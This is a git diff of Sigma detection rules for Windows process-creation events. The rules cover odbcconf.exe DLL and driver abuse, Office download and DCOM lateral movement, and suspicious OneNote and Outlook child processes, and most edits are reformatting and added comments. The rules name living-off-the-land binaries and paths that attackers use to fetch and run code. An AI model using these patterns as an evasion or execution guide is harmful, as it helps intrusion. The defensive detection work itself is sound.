100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml 
@@ -1,12 +1,10 @@ title: Suspicious Driver/DLL Installation Via Odbcconf.EXE id: cb0fe7c5-f3a3-484d-aa25-d350a7912729 related: - - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 - type: derived + - id: 3f5491e2-8db8-496b-9e95-1029fce852d4 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where - the driver doesn't contain a ".dll" extension. This is often used as a defense - evasion method. +description: Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. references: - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 @@ -24,12 +22,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'INSTALLDRIVER ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'INSTALLDRIVER ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml index 1a0f432c1..001096ed0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml 
@@ -1,8 +1,7 @@ title: Odbcconf.EXE Suspicious DLL Location id: 6b65c28e-11f3-46cb-902a-68f2cafaf474 status: experimental -description: Detects execution of "odbcconf" where the path of the DLL being registered - is located in a potentially suspicious location. +description: Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html @@ -21,10 +20,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + # Note: Add more suspicious locations + CommandLine|contains: - :\PerfLogs\ - :\ProgramData\ - :\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml index a4827e402..42a63a606 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml 
@@ -1,12 +1,10 @@ title: New DLL Registered Via Odbcconf.EXE id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 related: - - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 - type: similar + - id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 + type: similar status: experimental -description: Detects execution of "odbcconf" with "REGSVR" in order to register a - new DLL (equivalent to running regsvr32). Attackers abuse this to install and - run malicious DLLs. +description: Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -14,8 +12,7 @@ references: - https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176 - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ - https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion 
@@ -28,16 +25,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains|all: + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains|all: - 'REGSVR ' - .dll condition: process_creation and (all of selection_*) falsepositives: - - Legitimate DLLs being registered via "odbcconf" will generate false positives. - Investigate the path of the DLL and its content to determine if the action - is authorized. + - Legitimate DLLs being registered via "odbcconf" will generate false positives. Investigate the path of the DLL and its content to determine if the action is authorized. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml index 55b8ba7de..b7efed378 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml 
@@ -1,12 +1,10 @@ title: Potentially Suspicious DLL Registered Via Odbcconf.EXE id: ba4cfc11-d0fa-4d94-bf20-7c332c412e76 related: - - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 - type: derived + - id: 9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70 + type: derived status: experimental -description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL - in question doesn't contain a ".dll" extension. Which is often used as a method - to evade defenses. +description: Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -24,12 +22,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: 'REGSVR ' + # Note: The "/A" flag is not required to call a specific action + CommandLine|contains: 'REGSVR ' filter_main_dll_ext: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml index 90dcd6191..4bd7e31ad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml 
@@ -1,20 +1,18 @@ title: Response File Execution Via Odbcconf.EXE id: 5f03babb-12db-4eec-8c82-7b4cb5580868 related: - - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 - type: similar - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 + type: similar + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file which might contain a malicious action. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ - https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ -author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine - Bencherchali (Nextron Systems) +author: Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community, Nasreddine Bencherchali (Nextron Systems) date: 2023/05/22 tags: - attack.defense_evasion 
@@ -27,19 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' selection_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp condition: process_creation and (all of selection_*) falsepositives: - - The rule is looking for any usage of response file, which might generate false - positive when this function is used legitimately. Investigate the contents - of the ".rsp" file to determine if it is malicious and apply additional filters - if necessary. + - The rule is looking for any usage of response file, which might generate false positive when this function is used legitimately. Investigate the contents of the ".rsp" file to determine if it is malicious and apply additional filters if necessary. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml index 1938debf6..a836a28d8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml 
@@ -1,13 +1,12 @@ title: Suspicious Response File Execution Via Odbcconf.EXE id: 2d32dd6f-3196-4093-b9eb-1ad8ab088ca5 related: - - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 - type: derived - - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e - type: obsoletes + - id: 5f03babb-12db-4eec-8c82-7b4cb5580868 + type: derived + - id: 65d2be45-8600-4042-b4c0-577a1ff8a60e + type: obsoletes status: experimental -description: Detects execution of "odbcconf" with the "-f" flag in order to load a - response file with a non-".rsp" extension. +description: Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. references: - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/ @@ -26,18 +25,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - NewProcessName|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -f ' - ' /f ' filter_main_rsp_ext: - CommandLine|contains: .rsp + CommandLine|contains: .rsp filter_main_runonce_odbc: - CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" + # When odbcconf is run with the "/R" flag, it creates a "runonce" key to run at the next reboot + CommandLine|contains: .exe /E /F "C:\WINDOWS\system32\odbcconf.tmp" ParentProcessName: C:\Windows\System32\runonce.exe - NewProcessName: C:\Windows\System32\odbcconf.exe + NewProcessName: C:\Windows\System32\odbcconf.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml index 7cf06293c..ed38893e8 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml
@@ -1,8 +1,7 @@
 title: Uncommon Child Process Spawned By Odbcconf.EXE
 id: 8e3c7994-131e-4ba5-b6ea-804d49113a26
 status: experimental
-description: Detects an uncommon child process of "odbcconf.exe" binary which normally
- shouldn't have any child processes.
+description: Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes.
 references:
 - https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16
 - https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/
@@ -24,8 +23,6 @@ detection:
 condition: process_creation and selection
 falsepositives:
 - In rare occurrences where "odbcconf" crashes. It might spawn a "werfault" process
- - Other child processes will depend on the DLL being registered by actions like
- "regsvr". In case where the DLLs have external calls (which should be rare).
- Other child processes might spawn and additional filters need to be applied.
+ - Other child processes will depend on the DLL being registered by actions like "regsvr". In case where the DLLs have external calls (which should be rare). Other child processes might spawn and additional filters need to be applied.
 level: medium
 ruletype: Sigma
diff --git a/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml b/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
index 96f194b5a..e5a93e295 100644
--- a/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
+++ b/sigma/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
@@ -1,8 +1,8 @@ title: Potential Arbitrary File Download Using Office Application id: 4ae3e30b-b03f-43aa-87e3-b622f4048eed related: - - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 - type: obsoletes + - id: 0c79148b-118e-472b-bdb7-9b57b444cc19 + type: obsoletes status: experimental description: Detects potential arbitrary file download using a Microsoft Office application references: @@ -24,16 +24,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - NewProcessName|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_http: - CommandLine|contains: + CommandLine|contains: - http:// - https:// condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml b/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml index dbeffa9d3..96f38faa5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml @@ -1,10 +1,8 @@ title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp id: 551d9c1f-816c-445b-a7a6-7a3864720d60 status: experimental -description: 'Detects suspicious child processes of Excel which could be an indicator - of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. - - ' +description: | + Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. references: - https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922 - https://github.com/grayhatkiller/SharpExShell 
@@ -24,14 +22,14 @@ detection: selection_parent: ParentProcessName|endswith: \excel.exe selection_child: - - OriginalFileName: - - foxprow.exe - - schdplus.exe - - winproj.exe - - NewProcessName|endswith: - - \foxprow.exe - - \schdplus.exe - - \winproj.exe + - OriginalFileName: + - foxprow.exe + - schdplus.exe + - winproj.exe + - NewProcessName|endswith: + - \foxprow.exe + - \schdplus.exe + - \winproj.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml b/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml index 4936fbf0b..5e93d26a4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml @@ -1,9 +1,7 @@ title: Potentially Suspicious Office Document Executed From Trusted Location id: f99abdf0-6283-4e71-bd2b-b5c048a94743 status: experimental -description: Detects the execution of an Office application that points to a document - that is located in a trusted location. Attackers often used this to avoid macro - security and execute their malicious code. +description: Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. references: - Internal Research - https://twitter.com/Max_Mal_/status/1633863678909874176 
@@ -23,26 +21,29 @@ detection: EventID: 4688 Channel: Security selection_parent: + # Note: we add a parent shell to reduce FP. Add additional 3rd party shells that you might use ParentProcessName|endswith: - \explorer.exe - \dopus.exe selection_img: - - NewProcessName|endswith: - - \EXCEL.EXE - - \POWERPNT.EXE - - \WINWORD.exe - - OriginalFileName: - - Excel.exe - - POWERPNT.EXE - - WinWord.exe + - NewProcessName|endswith: + - \EXCEL.EXE + - \POWERPNT.EXE + - \WINWORD.exe + - OriginalFileName: + - Excel.exe + - POWERPNT.EXE + - WinWord.exe selection_trusted_location: - CommandLine|contains: + CommandLine|contains: + # Note: these are the default locations. Admins/Users could add additional ones that you need to cover - \AppData\Roaming\Microsoft\Templates - \AppData\Roaming\Microsoft\Word\Startup\ - \Microsoft Office\root\Templates\ - \Microsoft Office\Templates\ filter_main_dotx: - CommandLine|endswith: + # Note: We add this filter to avoid curious people clicking on template files + CommandLine|endswith: - .dotx - .xltx - .potx diff --git a/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml index a5c59bf81..23013778b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml 
@@ -1,17 +1,14 @@ title: Suspicious Microsoft OneNote Child Process id: c27515df-97a9-4162-8a60-dc0eeb51b775 related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Generic rule for suspicious office application child processes + type: derived status: test -description: Detects suspicious child processes of the Microsoft OneNote application. - This may indicate an attempt to execute malicious embedded objects from a .one - file. +description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18 - https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0 -author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic - (idea) +author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea) date: 2022/10/21 modified: 2023/02/10 tags: 
@@ -28,78 +25,78 @@ detection: selection_parent: ParentProcessName|endswith: \onenote.exe selection_opt_img: - - OriginalFileName: - - bitsadmin.exe - - CertOC.exe - - CertUtil.exe - - Cmd.Exe - - CMSTP.EXE - - cscript.exe - - curl.exe - - HH.exe - - IEExec.exe - - InstallUtil.exe - - javaw.exe - - Microsoft.Workflow.Compiler.exe - - msdt.exe - - MSHTA.EXE - - msiexec.exe - - Msxsl.exe - - odbcconf.exe - - pcalua.exe - - PowerShell.EXE - - RegAsm.exe - - RegSvcs.exe - - REGSVR32.exe - - RUNDLL32.exe - - schtasks.exe - - ScriptRunner.exe - - wmic.exe - - WorkFolders.exe - - wscript.exe - - NewProcessName|endswith: - - \AppVLP.exe - - \bash.exe - - \bitsadmin.exe - - \certoc.exe - - \certutil.exe - - \cmd.exe - - \cmstp.exe - - \control.exe - - \cscript.exe - - \curl.exe - - \forfiles.exe - - \hh.exe - - \ieexec.exe - - \installutil.exe - - \javaw.exe - - \mftrace.exe - - \Microsoft.Workflow.Compiler.exe - - \msbuild.exe - - \msdt.exe - - \mshta.exe - - \msidb.exe - - \msiexec.exe - - \msxsl.exe - - \odbcconf.exe - - \pcalua.exe - - \powershell.exe - - \pwsh.exe - - \regasm.exe - - \regsvcs.exe - - \regsvr32.exe - - \rundll32.exe - - \schtasks.exe - - \scrcons.exe - - \scriptrunner.exe - - \sh.exe - - \svchost.exe - - \verclsid.exe - - \wmic.exe - - \workfolders.exe - - \wscript.exe + - OriginalFileName: + - bitsadmin.exe + - CertOC.exe + - CertUtil.exe + - Cmd.Exe + - CMSTP.EXE + - cscript.exe + - curl.exe + - HH.exe + - IEExec.exe + - InstallUtil.exe + - javaw.exe + - Microsoft.Workflow.Compiler.exe + - msdt.exe + - MSHTA.EXE + - msiexec.exe + - Msxsl.exe + - odbcconf.exe + - pcalua.exe + - PowerShell.EXE + - RegAsm.exe + - RegSvcs.exe + - REGSVR32.exe + - RUNDLL32.exe + - schtasks.exe + - ScriptRunner.exe + - wmic.exe + - WorkFolders.exe + - wscript.exe + - NewProcessName|endswith: + - \AppVLP.exe + - \bash.exe + - \bitsadmin.exe + - \certoc.exe + - \certutil.exe + - \cmd.exe + - \cmstp.exe + - \control.exe + - \cscript.exe + - \curl.exe + - \forfiles.exe + - 
\hh.exe + - \ieexec.exe + - \installutil.exe + - \javaw.exe + - \mftrace.exe + - \Microsoft.Workflow.Compiler.exe + - \msbuild.exe + - \msdt.exe + - \mshta.exe + - \msidb.exe + - \msiexec.exe + - \msxsl.exe + - \odbcconf.exe + - \pcalua.exe + - \powershell.exe + - \pwsh.exe + - \regasm.exe + - \regsvcs.exe + - \regsvr32.exe + - \rundll32.exe + - \schtasks.exe + - \scrcons.exe + - \scriptrunner.exe + - \sh.exe + - \svchost.exe + - \verclsid.exe + - \wmic.exe + - \workfolders.exe + - \wscript.exe selection_opt_explorer: - CommandLine|contains: + CommandLine|contains: - .hta - .vb - .wsh @@ -109,9 +106,9 @@ detection: - .pif - .bat - .cmd - NewProcessName|endswith: \explorer.exe + NewProcessName|endswith: \explorer.exe selection_opt_paths: - NewProcessName|contains: + NewProcessName|contains: - \AppData\ - \Users\Public\ - \ProgramData\ @@ -119,14 +116,13 @@ detection: - \Windows\Temp\ - \Windows\System32\Tasks\ filter_teams: - CommandLine|endswith: -Embedding - NewProcessName|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe + CommandLine|endswith: -Embedding + NewProcessName|endswith: \AppData\Local\Microsoft\Teams\current\Teams.exe filter_onedrive: - CommandLine|endswith: -Embedding - NewProcessName|contains: \AppData\Local\Microsoft\OneDrive\ - NewProcessName|endswith: \FileCoAuth.exe - condition: process_creation and (selection_parent and 1 of selection_opt_* and - not 1 of filter_*) + CommandLine|endswith: -Embedding + NewProcessName|contains: \AppData\Local\Microsoft\OneDrive\ + NewProcessName|endswith: \FileCoAuth.exe + condition: process_creation and (selection_parent and 1 of selection_opt_* and not 1 of filter_*) falsepositives: - File located in the AppData folder with trusted signature level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml index 83013d71e..743593da6 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml @@ -1,11 +1,10 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled id: 55f0a3a1-846e-40eb-8273-677371b8d912 related: - - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 - type: similar + - id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 # Registry variation + type: similar status: test -description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" - which allows outlook to run applications or execute macros +description: Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros references: - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44 @@ -25,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules + CommandLine|contains: \Outlook\Security\EnableUnsafeClientMailRules condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml index 39bae894c..09696daa8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml 
@@ -16,7 +16,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|contains: \Temporary Internet Files\Content.Outlook\ + NewProcessName|contains: \Temporary Internet Files\Content.Outlook\ condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml index 45109b60b..632d8d5e3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml @@ -1,17 +1,16 @@ title: Suspicious Outlook Child Process id: 208748f7-881d-47ac-a29c-07ea84bf691d related: - - id: 438025f9-5856-4663-83f7-52f878a70a50 - type: derived - - id: e212d415-0e93-435f-9e1a-f29005bb4723 - type: derived + - id: 438025f9-5856-4663-83f7-52f878a70a50 # Office Child Processes + type: derived + - id: e212d415-0e93-435f-9e1a-f29005bb4723 # Outlook Remote Child Process + type: derived status: test description: Detects a suspicious process spawning from an Outlook process. references: - https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100 - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html -author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye - Team +author: Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team date: 2022/02/28 modified: 2023/02/04 tags: @@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \OUTLOOK.EXE - NewProcessName|endswith: + NewProcessName|endswith: - \AppVLP.exe - \bash.exe - \cmd.exe 
@@ -34,8 +33,8 @@ detection: - \forfiles.exe - \hh.exe - \mftrace.exe - - \msbuild.exe - - \msdt.exe + - \msbuild.exe # https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml + - \msdt.exe # CVE-2022-30190 - \mshta.exe - \msiexec.exe - \powershell.exe @@ -45,9 +44,22 @@ detection: - \scrcons.exe - \scriptrunner.exe - \sh.exe - - \svchost.exe - - \wmic.exe + - \svchost.exe # https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html + - \wmic.exe # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ - \wscript.exe + # Several FPs with rundll32.exe + # We started excluding specific use cases and ended up commenting out the rundll32.exe sub processes completely + # - '\rundll32.exe' + # filter_outlook_photoviewer: # https://twitter.com/Luke_Hamp/status/1495919717760237568 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains: '\PhotoViewer.dll' + # filter_outlook_printattachments: # https://twitter.com/KickaKamil/status/1496238278659485696 + # ParentImage|endswith: '\OUTLOOK.EXE' + # Image|endswith: '\rundll32.exe' + # CommandLine|contains|all: + # - 'shell32.dll,Control_RunDLL' + # - '\SYSTEM32\SPOOL\DRIVERS\' condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml index c73e36922..7421728bb 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml 
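Review bot: The commented-out `filter_outlook_photoviewer` / `filter_outlook_printattachments` blocks appended after `\wscript.exe` use the Sysmon field names `ParentImage` and `Image`, while the live part of this rule matches on the 4688 names `ParentProcessName` and `NewProcessName`; anyone who re-enables them as written will get filters that never match, and the `condition: process_creation and selection` line has no `not 1 of filter_*` clause to apply them anyway. If the block is kept as a reference, mark it as a carry-over, e.g. `# NOTE: field names below are from the Sysmon original; translate to ParentProcessName/NewProcessName and add "not 1 of filter_*" to the condition before re-enabling`.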
@@ -1,11 +1,10 @@ title: Suspicious Remote Child Process From Outlook id: e212d415-0e93-435f-9e1a-f29005bb4723 related: - - id: 208748f7-881d-47ac-a29c-07ea84bf691d - type: similar + - id: 208748f7-881d-47ac-a29c-07ea84bf691d # Outlook Child Processes + type: similar status: test -description: Detects a suspicious child process spawning from Outlook where the image - is located in a remote location (SMB/WebDav shares). +description: Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). references: - https://github.com/sensepost/ruler - https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html @@ -26,7 +25,7 @@ detection: Channel: Security selection: ParentProcessName|endswith: \outlook.exe - NewProcessName|startswith: \\\\ + NewProcessName|startswith: \\\\ condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml b/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml index 5c1ff930a..faa184519 100644 --- a/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml +++ b/sigma/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml 
